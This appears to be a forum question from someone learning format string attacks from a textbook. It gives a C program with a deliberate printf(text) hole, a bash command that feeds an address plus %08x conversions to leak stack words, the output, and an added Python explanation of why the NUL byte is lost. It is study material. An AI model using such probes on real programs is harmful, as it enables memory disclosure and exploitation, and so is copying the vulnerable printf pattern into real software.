I am studying format string attacks from my book Hacking: The Art of Exploitation. I have this little program, and this is the code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        char text[1024];
        static int test_val = -72;

        if(argc < 2) {
            printf("Usage: %s <text to print>\n", argv[0]);
            exit(0);
        }
        strcpy(text, argv[1]);

        printf("The right way to print user-controlled input:\n");
        printf("%s", text);

        printf("\nThe wrong way to print user-controlled input:\n");
        printf(text);

        printf("\n");

        printf("[*] test_val @ 0x%016x = %d 0x%08x\n", &test_val, test_val, test_val);
        exit(0);
    }
I want to enter the address in my program and print it. Address 0x00600b98, due to the little-endian byte order of the input bytes, is "\x98\x0b\x60\x00".

This is my bash code:
    ./fmt_vuln $(python -c 'print "\x98\x0b\x60\x00"')%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
But the problem is that the first address byte (\x00) becomes zero and is not entered into my address, and when the memory is printed, it becomes 25600b98. So my question is: why does this problem occur, and how can I enter the address byte 00?

This is the output:
    The right way to print user-controlled input:
    %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
    The wrong way to print user-controlled input:
    f7ff5000.f7dd7970.f7b128c0.f7fd8700.0000002b.ffffe3b8.f7ddb72d.25600b98.
    [*] test_val @ 0x0000000000600b98 = -72 0xffffffb8
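An added example (not part of the question, and not the book's code) that models why the eighth stack word reads 25600b98: bash drops NUL bytes from a $(...) command substitution, and execve() passes every argument as a NUL-terminated C string, so the trailing \x00 can never reach argv[1]. The three surviving address bytes are therefore followed directly by the first byte of the format string, '%' (0x25), which is what the little-endian %08x read shows. The input bytes below are constructed to mirror the command line in the question.

```python
import struct

def argv_bytes_after_substitution(payload: bytes, rest: bytes) -> bytes:
    """Model what actually reaches the program's argv[1].

    bash removes NUL bytes from command-substitution output, and execve()
    hands each argument over as a NUL-terminated C string anyway, so no
    NUL byte survives into argv. The program's strcpy() then copies every
    remaining byte into text[].
    """
    return payload.replace(b"\x00", b"") + rest

def first_word_le32(buf: bytes) -> int:
    """Read the first 4 bytes of buf as a little-endian 32-bit word,
    which is how the %08x conversions displayed the stack contents."""
    return struct.unpack("<I", buf[:4])[0]

def decode_word_le32(word: int) -> bytes:
    """Inverse view: the raw little-endian bytes behind a printed word."""
    return struct.pack("<I", word)

# Constructed input mirroring the question's command line.
ATTEMPT = b"\x98\x0b\x60\x00"   # little-endian 0x00600b98, including its NUL
FORMAT = b"%08x." * 8           # the conversions that walk up the stack

def diagnose():
    """Return (bytes at the start of text[], the word %08x would print)."""
    argv1 = argv_bytes_after_substitution(ATTEMPT, FORMAT)
    return argv1[:4], first_word_le32(argv1)

if __name__ == "__main__":
    head, word = diagnose()
    print(head, hex(word))   # prints b'\x98\x0b`%' 0x25600b98
    # The observed word decodes to the three address bytes plus '%':
    print(decode_word_le32(0x25600b98))   # prints b'\x98\x0b`%'
```

The defensive takeaway is the one the program itself labels "the right way": passing user input as the argument of a fixed format (printf("%s", text)) means no byte of that input is ever interpreted as a conversion, whatever its position or value.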